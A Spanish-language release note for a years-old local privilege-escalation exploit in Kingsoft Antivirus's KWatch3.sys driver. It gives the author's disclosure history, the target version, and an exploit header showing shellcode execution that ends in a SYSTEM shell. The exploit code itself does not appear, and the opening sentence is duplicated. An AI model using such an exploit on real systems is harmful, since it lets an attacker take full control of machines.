
Un exploit de hace años de una vulnerabilidad local de EoP en el controlador KWatch de Kingsoft Antivirus versión 2009.3.17.77.
Una explotación de años de antigüedad de una vulnerabilidad local de elevación de privilegios (EoP) en el controlador KWatch de Kingsoft Antivirus versión 2009.3.17.77.
Reporté el problema en enero de 2014 y fui notificado del CVE más de 8 años después. Decidí subir esto porque es bastante divertido encontrar mi antiguo código y que haya tomado tanto tiempo.
Por lo tanto, esta no debe ser una vulnerabilidad nueva a pesar del nuevo CVE -- una búsqueda rápida ya mostró múltiples informes de una vulnerabilidad de aspecto similar.
Aún agradezco a IPA por hacer su parte y alegrarme el día.
El archivo vulnerable parece ser ffdedbaeccbcf0b697675b24ca313cbb8e1c9ba1bd2f0a0b58a2d6a04a038479
//
// Exploit for Kingsoft Antivirus KWatch Driver (KWatch3.sys)
// Target File Version: 2009.3.17.77
// Affected Product: Kingsoft Internet Security 9 Plus
//
/*
------------------------------------------------------------------------------
Shellcode is located at 7E7E7E7E.
The device was opened as 00000020.
Shellcode was executed.
The SYSTEM shell was launched.
This process will be suspended for ever.
------------------------------------------------------------------------------
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\user\Desktop>whoami
nt authority\system
------------------------------------------------------------------------------
*/